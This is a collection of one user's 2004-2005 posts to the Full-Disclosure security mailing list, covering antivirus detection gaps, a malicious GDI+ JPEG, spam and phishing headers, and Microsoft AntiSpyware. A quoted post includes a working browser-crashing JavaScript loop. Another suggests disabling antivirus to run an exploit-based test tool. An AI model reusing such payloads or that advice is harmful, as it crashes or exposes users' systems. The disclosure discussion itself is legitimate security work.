[Full-Disclosure] RE: Full-Disclosure Digest, Vol 4, Issue 11

[RandallM]

 
Andrey,
Just to add to the concern you bring up is what VirusTotal also shows on the
Detection failures.
http://www.virustotal.com/flash/graficas/grafica4_en.html

Of course for me that's job security but none the less its pitiful. And now
in steps Microsoft with Billions under its belt and I'll bet the odds
won't change much. That's where I get really confused.
We know that costs go in to the billions when networks go down due to
infections. I know of no one but the parity actors for AOL who welcome
infections. I'm just dumb founded on the abilities of virus companies to
battle this. 

I'm finding that my preconceived label of who the virus writers are and look
like are rapidly being changed. I used to envision this lad with a tattered
def leopard shirt sitting with an old laptop in the wee early dawn finishing
up his code and getting ready to test it on the old grey Pentium box in the
corner.

Is this the guy beating the pants off the billion dollar companies?

I would also like to add that what you've done is very impressive. I'm
reading your paper now. I could and will never be able do such so thanks for
this well written piece. Please tell me your not wearing a def leopard
t-shirt!

thank you
Randall M

If we ever forget that we're one nation under God, then we will be a nation
gone under. 
- Ronald Reagan
_

 


Andrey so correctly acknowledged:
--

Message: 8
Date: Fri,  4 Mar 2005 15:03:10 -0600
From: Andrey Bayora [EMAIL PROTECTED]
Subject: [Full-Disclosure] Bypass of 22 Antivirus software with GDI+
bug exploit Mutations - part 2
To: full-disclosure@lists.netsys.com
Cc: bugtraq@securityfocus.com
Message-ID: [EMAIL PROTECTED]
Content-Type: text/plain; charset=ISO-8859-1


The first part is here:
http://archives.neohapsis.com/archives/fulldisclosure/2004-10/0475.html

First, this post isnt about how dangerous GDI+ bug or malicious JPEG
image, but how good is your antivirus software.

The issue is: only 1 out of 23 tested antivirus software can detect
malicious JPEG image (after 6 month from the public disclosure date).

Here is the link to results, JPEG file and my paper (GCIH practical)
that describes how to create this one:
http://www.hiddenbit.org/jpeg.htm

This one vendor (Symantec) that can detect it, obviously do it with the
heuristic detection (I dont work for them and didnt send them any
file, moreover I know cases when Symantec didnt detect a virus that
other vendors do).
ClamAV antivirus detected this JPEG file 4 month ago, but strangely
cant detect it now.
What happened?
What about 22 antivirus software vendors that miss this malicious JPEG?
The pattern or problem in these JPEG files is known and still many
antivirus software vendors miss it, did it can represent the quality of
heuristic engines?

OK, we know that any antivirus software can provide 100% protection

P.S.  After my first post (October 14,2004) about this problem  all
antivirus software vendors added detection to the demo file provided by
me in couple of hours. Sadly for me, but it seems that they prefer
playing cat and mouse and not improve heuristic engines

Regards,
Andrey Bayora.
CISSP, GCIH

-

And so ends his thoughts




___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Strange connection from google desktop search

[RandallM]

The following established connection was noticed:
 TCPxxx.xxx.x.xx:2869  64.233.187.104:80  ESTABLISHED 2824

Process viewer reported it to be:
Googledesktop.exe

SamSpade says:

03/05/05 21:54:31 whois  64.233.187.104
I don't recognise any domain in 187.104, trying internic

whois -h whois.internic.net 187.104 ...

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

No match for 187.104.

03/05/05 22:07:21 finger @ 64.233.187.104
finger @ 64.233.187.104 failed, no such host

03/05/05 22:07:47 dns  64.233.187.104
No DNS for this address
(host doesn't exist)



Have I been up to long and too much coffee or is this strange? Or is this
because I have been playing around with the bulzano2.jpg!!! 


thank you
Randall M

If we ever forget that we're one nation under God, then we will be a nation
gone under. 
- Ronald Reagan
_

 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Microsoft sure fire customer satisfaction

[RandallM]

___
Afraid Microsoft's anti-spyware will muck up your hard drive, erasing your
digital photos, music collection and work files?

Don't worry, you've got a $5 rebate coming your way in this worst-case
scenario--enough to buy five songs on iTunes. That is, if you read and take
advantage of Microsoft's legal promise.

Read more here: http://news.zdnet.com/2100-1009_22-5590042.html
___

thank you
Randall M
 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] [Full Disclosure] RE: this IS FUN!!!!

[RandallM]

Jordan wrote:



[Full-Disclosure] this is fun?
Jordan Klein haplo at haplo.net 
Sun Feb 20 11:12:39 EST 2005 

Previous message: [Full-Disclosure] this is fun? 
Next message: [Full-Disclosure] this is fun? 
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] 




I wouldn't call that fun.  It took my system to 100% cpu usage, spawned a 
ton of windows, and eventually caused firefox to crash.  I guess that crash 
was firefox's built-in protection mechanism against this type of DoS.  :-)

I haven't tried this with popup blocking enabled, since this is my work 
machine, and I have to allow popups so our internal sites work.  (Damn, lazy

web developers...)

-- 
Jordan Klein ~  Beware of dragons
haplo at haplo.net  ~  for you are crunchy
UNIX System Administrator~  and go well with ketchup
- Original Message - 
From: Christian evilninja at gmx.net
To: full-disclosure at lists.netsys.com
Cc: Brandy Simon brandysimon at gmail.com
Sent: Sunday, February 20, 2005 7:51 AM
Subject: Re: [Full-Disclosure] this is fun?

}}

WOW! I had fun trying to capture the source page!!!






thank you
Randall M
 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Scan for IRC

[RandallM]

I am so sorry for interrupting the list. I'm trying to pick up IRC
communications on the network. I've made some filters for Ethereal and
Observer but can't seem to pick it up. I'm doing something wrong. Used the
6668-6669 ports. Any help? 
 
thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Wide spread DSV

[RandallM]

 

Problem: Down Syndrome Virus (DSV)
Affected devices: Various web, internet, intranet and PC's.
Severity: DOA (Denial of Access).
Author: Ima Notserious 
Warnings: Elevated
Fix: At present no available fixes.

:
Overview:

Many users have been reporting various sites to be down. 
This has a wide spread effect and can be found 
across the internet and intranets. The DSV has even been
reported to effect PC's and other devices

::
Details:

Internet/Intranet: When user clicks on links or types in addresses
browsers hesitate then display 404 messages.
 
PC's: When power buttons are used to start PC, expected 
operating systems fail to load with various failed messages.

::
Reason for Elevated Warnings: 

The DSV was elevated do to the infection spreading to a PC. 
A researcher found this after visiting one of the reported down sites. 
After reboot of PC, the PC failed to load. The site in question was
Amazon.COM.

::
Fix: 

At present researchers are conducting various tests to find out 
how the DSV infects, the mechanism used to spread and 
what if any fixes are available. It has been reported that the 
possible spread is thru port 25. At present some service providers
have begun to test this by blocking the port. 

::
Work around:

Do not visit any sites on internet or intranets. Do not turn PC's off if you

have recently visited any sites on the Web.



Advisory by: WorldWideWatchers.Inc
Copyright (c) 2004 WWW.Inc


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Full-Disclosure: Interesting but suspicious possible phishing mail

[RandallM]

Have been getting a number of these come thru also at work. 
Of course all the users are asking me questions about these.
They all have the strange words, paragraphs, and questions like this one.
They really got my attention. I at first thought they were hidden messages
but
Not so as the one we receive come as text. 

thank you
Randall M
 
 

|--
|
|Message: 4
|Date: Tue, 11 Jan 2005 02:27:55 +
|From: DAN MORRILL [EMAIL PROTECTED]
|Subject: [Full-Disclosure] Interesting but suspicious possible
| phishing mail
|To: full-disclosure@lists.netsys.com
|Message-ID: [EMAIL PROTECTED]
|Content-Type: text/plain; format=flowed
|
|Hi folks,
|
|Got this really interesting mail in my box today, and 
|knowing that I haven't 
|used that e-mail address or ordered anything on line lately. 
|Wondering if it 
|might not be a phishing e-mail. Haven't seen anything like 
|this before. 
|Anyone see anything similar?
|r/
|Dan
|
|
|
|from :  Gabrielle U. Philips, Jr [EMAIL PROTECTED]
|Sent :  Monday, January 10, 2005 10:40 PM
|To :  Gabrielle U. Philips, Jr [EMAIL PROTECTED]
|CC :  [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], 
|[EMAIL PROTECTED], [EMAIL PROTECTED]
|Subject :  Shipping Notification, Tracking Number : 
|TCD461649887242ESB
|
|MIME-Version: 1.0
|Received: from msnmail2.uswest.net ([63.226.138.22]) by 
|mc10-f38.hotmail.com 
|with Microsoft SMTPSVC(6.0.3790.211); Mon, 10 Jan 2005 14:45:54 -0800
|Received: (qmail 72801 invoked by uid 0); 10 Jan 2005 22:45:55 -
|Received: from unknown (63.226.138.18) by 
|msnmail2.uswest.net with QMQP; 10 
|Jan 2005 22:45:55 -
|Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
|Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by 
|mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
|X-Message-Info: JGTYoYF78jHm2Kmrh/becsOSGajhcE+aqhdcaXLDOFI=
|Delivered-To: [EMAIL PROTECTED]
|X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 
|Fuz1=4Fuz2=4
|Return-Path: [EMAIL PROTECTED]
|X-OriginalArrivalTime: 10 Jan 2005 22:45:54.0814 (UTC) 
|FILETIME=[24BA71E0:01C4F766]
|
|
|
|
|Content-Type: multipart/mixed; 
|boundary=-mpls-cmx-12.inet.qwest.net-1105397155-56110
|
|
|Content-Type: text/plain
|
|
|This email was forwarded from your previous Qwest.net email address
|to your MSN email address.  To discontinue email forwarding for any
|future emails sent to your previous Qwest.net email address, please
|contact MSN Customer Service.
|
|
|
|
|
|Content-Type: message/rfc822
|Content-Description: forwarded message
|Content-Transfer-Encoding: 8bit
|Content-Disposition: inline
|
|
|From: Gabrielle U. Philips, Jr [EMAIL PROTECTED]
|To: Gabrielle U. Philips, Jr [EMAIL PROTECTED]
|Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], 
|[EMAIL PROTECTED], 
|[EMAIL PROTECTED]
|Subject: Shipping Notification, Tracking Number : TCD461649887242ESB
|Sent: Monday, January 10, 2005 10:40 PM
|MIME-Version: 1.0
|Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
|Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by 
|mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
|X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 
|Fuz1=4Fuz2=4 Content-Type: multipart/alternative; 
|boundary=--Part_GRKDac7J6.oMXawOLoYO4
|
|
|Content-Type: text/html; format=flowed; charset=iso-8859-15
|Content-Transfer-Encoding: quoted-printable
|
|Check your status Below:
|
|cov2pa.com/track.asp?cg=1c=tc
|
|The illiterate of the 21st century will not be those who 
|cannot read and 
|write, but those who cannot learn, unlearn, and relearn. 
|Alvin Toffler
|Those police officers are practicing driving between the two 
|buildings.
|The illiterate of the 21st century will not be those who 
|cannot read and 
|write, but those who cannot learn, unlearn, and relearn. 
|Alvin Toffler
|Haven't the photographers already disliked praying?
|Few things are harder to put up with than the annoyance of a 
|good example.
|3
|When people are free to do as they please, they usually 
|imitate each other. 
|-Eric Hoffer (1902-1983)
|Have you already loved sleeping?
|

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable

[RandallM]

On Thu, 6 Jan 2005, James Patterson Wicks wrote:
 While this was just a quick test to satisfy my curiosity about the
 Microsoft tool, my initial feeling is that the Microsoft AntiSpyware is
 worth a test deployment in the office.  This beta expires in July.
 Hopefully the final version will be free and allow for centralized
 domain management.  It's the least that Microsoft can do.
 
I don't think it's going to be free. While doing a small amount of research
on the spyware community I found this text string in the
GianttAntiSpywareUpdater.exe:
 
Because your Microsoft AntiSpyware subscription has expired, needed spyware
definitions could NOT be downloaded and installed. Your definitions should
be updated as soon as possible to prevent spyware infections. Your Microsoft
AntiSpyware Subscription has Expired
 
And within the gcASNotice.exe
 
We hope your trial went well. Unfortunately you are now no longer protected
from the growing dangers of spyware, worms and trojans. Continue to keep
your self protected, purchase the full version today with a full money back
guarantee.
 
I also have been a bit curious concerning the user community and the way
this type of software updates, whether or not they can be exploited this
way.
 
Now I would like to RANT a bit here. After picking myself up off the floor
from reading this I chose to post this. The primary reason most spyware and
trojans get unauthorized access to my computer is because of my blind
trust in the products I use. One such product was a browser embedded in the
operating system I own. To rid myself of such unauthorized accesses I had to
educate myself and find software to do it. Most of them are freely developed
(God Bless Them Each and Everyone). Alone comes a program to do this own by
the operating system and products I use. I was happy and thought, who would
be better equipped to do such then the owners themselves. After all they
wrote and know all the programming of it. The can surely protect it.
According to the above txt scans of this product I have to pay them to
defend what they allowed. Its a strange strange world after all.
 
I don't want to sound condescending but, if this is the case, this Company
software needs some humility lessons brought to them through heavy
exploitations of such software. On the other hand if such Company would
provide this as a service to me then they need a community helping hand.
 
thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Microsoft AntiSpyware - First Impression

[RandallM]

KF (lists) wrote:
 

Message: 11
Date: Fri, 07 Jan 2005 11:19:56 -0500
From: KF (lists) [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Microsoft AntiSpyware - First
Impressions
To: full-disclosure@lists.netsys.com
Message-ID: [EMAIL PROTECTED]
Content-Type: text/plain; charset=windows-1252; format=flowed

Do a software update check with this thing and you get 
GIANTAntiSpywareMain.exe  listening on port 2571 until the software is 
closed. Feel free to beat on and fuzz that port fellas. =]
-KF



I found this with tcpview:
 
 
GIANTAntiSpywareMain.exe:3424 TCP p4fast..com:3256 216.32.240.26:http
ESTABLISHED 
GIANTAntiSpywareMain.exe:3424 UDP p4fast:3255 *:*  

OrgName:Savvis 
OrgID:  SAVVI-2
Address:3300 Regency Parkway
City:   Cary
StateProv:  NC
PostalCode: 27511
Country:US

ReferralServer: rwhois://rwhois.exodus.net:4321/

NetRange:   216.32.0.0 - 216.35.255.255 
CIDR:   216.32.0.0/14 
NetName:SAVVIS
NetHandle:  NET-216-32-0-0-1
Parent: NET-216-0-0-0-0
NetType:Direct Allocation
NameServer: DNS01.SAVVIS.NET
NameServer: DNS02.SAVVIS.NET
NameServer: DNS03.SAVVIS.NET
NameServer: DNS04.SAVVIS.NET
Comment:
RegDate:1998-07-30
Updated:2004-10-07


GET / HTTP/1.1 Host: 216.32.240.26 Connection: close User-Agent: Sam Spade
1.14  HTTP/1.1 403 Forbidden Content-Length: 218 Content-Type: text/html
Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET MicrosoftOfficeWebServer:
5.0_Pub Date: Sat, 08 Jan 2005 16:40:07 GMT Connection: close

If you look at for instance system process, BHO area and select an unknown,
an option to send to spynet for anayliss is there. If you select this, it
reports to the 216.31.240.26 also.

On a funny note, under ActiveX area it list the microsoft update as this:

Microsoft Windows Update Control Engine
This is an unknown ActiveX

File path: C:\WINDOWS\System32\iuengine.dll
Description: Windows Update Control Engine
Publisher: Microsoft Corporation
Last modified: Tue, 26 Aug 2003 01:19:52 GMT
Installed version: 5,4,3790,14
Download location:
http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37921.827546
2963

It does look as if they jumped very quickly to launch this software!


 
thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] FIREFOX flaws: nested array sort()

[RandallM]

 
So, where do you all stand. Exploit for fame or for purpose?

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Berend-Jan Wever
 Sent: 25 November 2004 01:05
 To: [EMAIL PROTECTED]; 
 [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Subject: [Full-Disclosure] FIREFOX flaws: nested array sort() 
 loop Stack overflow exception
 
 Hi all,
 
 Same flaw works for Firefox as well as MSIE:
 
 HTML
   SCRIPT a = new Array(); while (1) { (a = new 
 Array(a)).sort(); } /SCRIPT
   SCRIPT a = new Array(); while (1) { (a = new 
 Array(a)).sort(); } /SCRIPT /HTML
 
 Added to the list: 
 http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html
 
 I'd have loved to CC mozilla about this, but I didn't have 
 the time to do the crash course how to write a bug report 
 and go through all that bugzilla crap.
 
 Cheers,
 SkyLined
 http://www.edup.tudelft.nl/~bjwever



Randall M
 


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] How the hell can we CAN SPAM??

[RandallM]

It's just getting ridicules not to mention what it cost all of us in the
end. And might I add doesn't make since. I mean, they spam selling something
with no real contact but a spoofed one or real website to reach (most of
the time). I placed an web appliance at my work place and catch an average
of 52000 in 7 days. My ISP has spam filters yet I still receive a number a
day. Now I am also the return to sender because of email spoofing. I get
about 40-50 returned to sender, or can't deliver emails (not to mention what
my ISP catches). There is not a dam thing I can do about it. 

Let add to this the problem for legit company's who have this done to them
and they are placed on the blacklist. They are victims of this abuse that
causes undo problems with their business affairs and it backlashes to their
clients. I often have to help fight for some of our clients who have been
victimized this way. They are not spammers but their addresses have been
spoofed and blacklisted and now any client who uses spam blacklist block
their legit address and miss their business correspondence. 

As for myself I am stuck with the pain of removing my email and setting up
another one and the pain of contacting all correspondences who have that one
to change it to the new one, etc., etc..  

Or I could attempt to figure out the real senders, send abuse email out and
hope someone would answer and help. Doubt that would work. 

Example:
_-
Date: Wed, 17 Nov 2004 12:12:27 +
From: Mail Delivery System [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Mail delivery failed: returning message to sender

This message was created automatically by mail delivery software (Exim). A
message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:
[EMAIL PROTECTED] unknown local-part byoder in domain bt.net -- This is
a copy of the message, including all the headers. -- Return-path:
lt;[EMAIL PROTECTED]gt; Received: from [217.35.209.184]
(helo=insmtp22.bt.net) by insmtp01.ukcore.bt.net with esmtp (Exim 3.36 #1)
id 1CUOfh-000628-00 for [EMAIL PROTECTED]; Wed, 17 Nov 2004 12:12:25 +
Received: from [211.186.238.119] (helo=therightmoment.com) by
insmtp22.bt.net with smtp (Exim 3.36 #1) id 1CUOTM-00043p-00 for
[EMAIL PROTECTED]; Wed, 17 Nov 2004 11:59:40 + Received: from fidnet.com
(fidnet.com.mail5.psmtp.com [64.18.5.10]) by therightmoment.com (Postfix)
with ESMTP id 3097F4FF8C for lt;[EMAIL PROTECTED]gt;; Wed, 17 Nov 2004
06:09:31 -0600 Message-ID: lt;[EMAIL PROTECTED]gt;
From: Tickled B. Pulsar lt;[EMAIL PROTECTED]gt; To: Byoder
lt;[EMAIL PROTECTED]gt; Subject:
=?iso-8859-1?B?VmFyaW91cyBQaWxscywgTG93IHJhdGVzLCBtb25leWJhY2sgZ3VhcmFu?=
=?iso-8859-1?B?dGVlISA=?= Date: Wed, 17 Nov 2004 06:09:31 -0600
MIME-Version: 1.0 Content-Type: multipart/alternative; charset=iso-8859-1;
boundary==_NextPart_000_0005_DDA5806C.B53BEAE9 X-Priority: 3
X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1081
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2479.0006
___

The email message that was enclosed for these headers was a complete non
sense one full of meaniless verbage like:

__-
TBODY  TR  TD bgColor=3d#99 height=3d22  DIV align=3dcenterSPAN
class=3dstyle13Once something becomes di= scernible, or understandable, we
no longer need to repeat it=2e We can de= stroy
it=2e/SPAN/DIV/TD/TR/TBODY/TABLE TABLE cellSpacing=3d0
cellPadding=3d0 width=3d100% border=3d0  TBODY
__

We talk about the scare of government control. Someone then tell me who else
has the power to step in and stop the viral and spam. Who else has the money
to back massive counter measures to put a stop to it all. I'm I just being
too critical and a doom and gloom user. 

FYI:
Yes I have ensured that I'm not zombified. I then tested again by turning
off my internet use for two days and still received returns for those days.
I clean machines for things like this for a living. Thanks for asking.
 
thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Securing My Mobile users

[RandallM]

I'm attempting to find some simple free programs that will help secure my
mobile users. Simple because anything above sitting in the tray will confuse
them. I'm testing this on a computer that is XP2 patched, McAfee 80 which
has file creation type protection, Google blocker, Spybot and Previx
protection system program.
 
A little program called pcAudit which claims to act like a hacker
intervention has you do a few things then sends the information to their
server and creates a report for you to view. The report show what you typed
in the browser or program you used, shows what's in your documents folder,
and takes a snapshot of your desktop.
 
The settings I ended with was to prevent creation of .dll files in system,
system32 folders, prevent unwanted programs, key loggers, etc., in McAfee.
I did not do anything with XP firewall and kept Previx at defaults.
 
Each time the pcAudit could show the same results even if the .dll was
prevented from being created. It still gave the snapshots, documents folder
and reported what I typed. 
 
What I'm seeing here is that the most simplest settings that can be aloud
have no protection. The mobile salesperson can't and refuses to be bothered
with any more then this. If this simple program could do that, my users
are doomed if they clicked on a link and a more malicious program was
loaded. 

Has anyone here examined this pcAudit program? Can they explain what makes
it tick? 
 
thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] RE: Norton AntiVirus Script Blocking Exploit -- Symantec's response

[RandallM]

Daniel,
Man, that was just awsome! Enjoyed the movie and the popcorn! Like to see
more PoC like that!!

thank you
Randall M



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Code)

[RandallM]

Daniel told me:
--__--__--


 Message: 4 Date: Wed, 03 Nov 2004 20:09:02 -0500 
From: Daniel Milisic [EMAIL PROTECTED] 
To: [EMAIL PROTECTED], [EMAIL PROTECTED] 
Subject: [Full-Disclosure] Norton AntiVirus 2004/2005 Scripting
Vulnerability Pt.3 (Includes PoC VBScript Code) 

Hi All, I have major issues with the quality of Norton AntiVirus. 
For some history, see:
http://seclists.org/lists/fulldisclosure/2004/Oct/0540.html - Norton
AntiVirus 2004 Script Blocking Failure (Rant and PoC enclosed)
http://seclists.org/lists/fulldisclosure/2004/Oct/0775.html - Norton
AntiVirus 2004/2005 Script Blocking Redux Symantec's Response to this issue:
(From a week ago) ScriptBlocking is intended to provide proactive detection
against script-based worms and this component of Norton AntiVirus has been
effective at doing this since its introduction in 2001 Huh? Below is a
'typical' script-based virus that Norton AntiVirus will allow a user to run,
without *any* intervention on NAV's part whatsoever. It's likely that code
similar to this is already appended to script-based threats/worms to assist
their penetration in the wild. 

--__--__--
 
Dam. McAfee picked it right up as viral.


thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Gmail fixed

[RandallM]

6. Google blocks Gmail exploit

By: John Leyden, The Register

Google has fixed a flaw in its high-profile webmail service, Gmail, which
created a possible route for hackers to gain full access to a user's email
account simply by knowing their user name.

http://www.securityfocus.com/news/9843
http://www.securityfocus.com/news/9843 

 

P.S.
Anyone else on this list been a victim of email spoofing lately? An old
account (non default)of mine is being used and I'm receiving about 20-30
returned emails(And I mean spoofed email headers). 

thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Help, possible rootkit

[RandallM]

Billy said:

--__--__--

Message: 1
From: BillyBob [EMAIL PROTECTED]
To: Full Disclosure [EMAIL PROTECTED]
Date: Sat, 23 Oct 2004 13:05:29 -0300
Subject: [Full-Disclosure] Help, possible rootkit

I have noticed that my XP system is behaving like I have a rootkit.

-- -- --
 __ __


Billy,
1. Go directly to safe-mode
2. go to regedit and check start up processes in computer and user and
research each unfamiliar
3. run hijack this program
4. run spybot
5. upon start up use tcp-view and process viewer from sysinteral.com to see
connections

One person made mention of this once when I had this problem on a sales
laptop:

If you have scripting enabled, it is possible that one of them is doing
this in the background.  Scripts can remain active after you have left
the page that started them.

Some PC programmers tend to use busy waits instead of calling a 
sleep() or hibernate() function.  This tends to kill performance on 
multiuser systems.

Optical mice also don't work well with certain colored pads and such. Make
sure you try
A different surface. 

Also of course clean the area very well. A piece of hair can cause problems.

Just some quick thoughts
 


thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Senior M$ member says stop using passwords completely!

[RandallM]

 http://blogs.msdn.com/robert_hensing/archive/2004/07/28/199610.aspx
http://blogs.msdn.com/robert_hensing/archive/2004/07/28/199610.aspx 
 
thank you
Randall M
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Your daily internet traffic report

[RandallM]

 
Router  locationindex 
router1.iust.ac.ir  Iran (Tehran)   29

Which one of you are attacking Iran
http://www.internettrafficreport.com/asia.htm 
 
thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] Senior M$ member says stop using passwords completely!

[RandallM]

I did. He said stop using passwords. I'm not flamming, I was passing on an
article.

thank you
Randall M
 
 

|-Original Message-
|From: Aviv Raff [mailto:[EMAIL PROTECTED] 
|Sent: Saturday, October 16, 2004 10:19 AM
|To: 'RandallM'; [EMAIL PROTECTED]
|Subject: RE: [Full-Disclosure] Senior M$ member says stop 
|using passwords completely!
|
|
|No...
|Senior Microsoft member says: use passPHRASES instead of passWORDS.
|
|You should read the article before you start flaming.
|
|-- Aviv. 
|
|-Original Message-
|From: [EMAIL PROTECTED]
|[mailto:[EMAIL PROTECTED] On Behalf Of RandallM
|Sent: Saturday, October 16, 2004 3:14 PM
|To: [EMAIL PROTECTED]
|Subject: [Full-Disclosure] Senior M$ member says stop using 
|passwords completely!
|
|
| 
|http://blogs.msdn.com/robert_hensing/archive/2004/07/28/199610.aspx
|http://blogs.msdn.com/robert_hensing/archive/2004/07/28/199610.aspx 
| 
|thank you
|Randall M
| 
|
|

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] (no subject)

[RandallM]

Oh my Gawd! I think I've fallen in love! You will be hearing from me soon!
 
--__--__--

Message: 4
Date: Wed, 13 Oct 2004 10:28:40 -0700 (MST)
From: Jay Jacobson [EMAIL PROTECTED]
To: Mr. Rufus Faloofus [EMAIL PROTECTED]
cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Nessus experience

SNIP

Of course, another good place for these questions would be the Nessus 
mailing list. You may also want to check out Edgeos' Nessus Knowledge 
Base, which documents every configuration option in Nessus 
http://www.edgeos.com/nessuskb/.

-- 
..
..  Jay Jacobson
..  Edgeos, Inc. - 480.961.5996 - http://www.edgeos.com
..
..  Network Security Auditing and
..  Vulnerability Assessment Managed Services
..


--__--__--
 
thank you
Randall M
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

RE: [Full-Disclosure] RE: Full-Disclosure digest, Vol 1 #1955 - 19 msgs

[RandallM]

GuidoZ
Didn't mean to have you apologize, it did it's job. It showed
That I was not vulnerable. I just found it interesting that my
AV called it something that could not be found through search.

thank you
Randall M
 
 

|-Original Message-
|From: GuidoZ [mailto:[EMAIL PROTECTED] 
|Sent: Thursday, October 07, 2004 1:16 AM
|To: RandallM
|Cc: [EMAIL PROTECTED]
|Subject: Re: [Full-Disclosure] RE: Full-Disclosure digest, 
|Vol 1 #1955 - 19 msgs
|
|It might be detected as Trojan.Moo or any other variant of 
|the JPEG exploit. As I said, it attempts to exploit the 
|system to see if it's vulnerable, using an infected JPG. 
|The file I provided is simply a SFX with a batch file and 
|the infecte JPG (named exploit.bak). No attempt has been 
|made at all to mask what's inside.
|
|I figured those that would want to use it would either not 
|worry about the virus warnings, or not get them at all and 
|REALLY need the fix it helps provide. =) Email me at the 
|address provided in my original email (exploit _AT_ guidoz 
|_DOT_ com) and I'll provide a link to the batch files and 
|such so you may modify them as you wish.
|
|Sorry for any confusion with the AV. I should of warned 
|about that in the original email. (Others have written me 
|asking the same question.) I only provided it to possibly 
|help others who have lots of friends asking them for help to 
|patch their systems. This simply sees if they are 
|vulnerable, then leads them through the steps to patch the 
|system if they are. (You may have to tell them to ignore AV 
|warnings, or disable the AV scanner. Again, I urge you to 
|test this on a NON-PRODUCTION machine first. See what it 
|contains, read the batch files, see what it downloads, etc.)
|
|Please feel free to ask me any questions. Hope it helps someone else.
|
|--
|Peace. ~G
|
|
|On Wed, 6 Oct 2004 20:59:28 -0500, RandallM 
|[EMAIL PROTECTED] wrote:
| 
| |--__--__--
| |
| |Message: 14
| |Date: Wed, 6 Oct 2004 15:53:32 -0700
| |From: GuidoZ [EMAIL PROTECTED]
| |Reply-To: GuidoZ [EMAIL PROTECTED]
| |To: [EMAIL PROTECTED]
| |Subject: [Full-Disclosure] Quick JPEG/GDI test  fix 
|(timesaver) 
| | |Hello list, | |I wrote a very simple program/batch file 
| that tests for the JPEG |exploit, then if affected, provides 
| instructions on how to patch the |exploit. It has been 
|tested on my 
| own lil happy lab network, as well |as one one network 
|where I'm a 
| sysadmin. (Tested on Windows XP Home |and Pro, SP1a and 
|SP2.) | 
| |It DOES test for the exploit by attempting to use an 
|infected JPG 
| |which downloads the instructions for fixing it, if 
|exploited. By 
| |viewing the strings in the JPG, you can see the file it 
|downloads 
| and |check it out for yourself. It's clean. =) Just 
|contains a batch 
| file |and a program to launch the batch file. (The file 
|that gets 
| |downloaded |is a simple SFX.) Links are below. It contains a 
| warning saying it's |about to try to exploit the system 
|and to save 
| data in open programs.
| |(It also warns that Explorer may crash.) | |I wrote 
|this merely 
| to save myself time and allow friends/family to |test their own 
| systems, then patch them without having to call me for 
||help. It's 
| not been tested in every environment and in every |scenario.
| |If you find a problem, feel free to email me (exploit 
|_AT_ guidoz 
| |_DOT_ com) Obviously I'm not responsible if it's abused 
||somehow, 
| or if |it breaks something, etc. Feel free to modify it 
|to suit your 
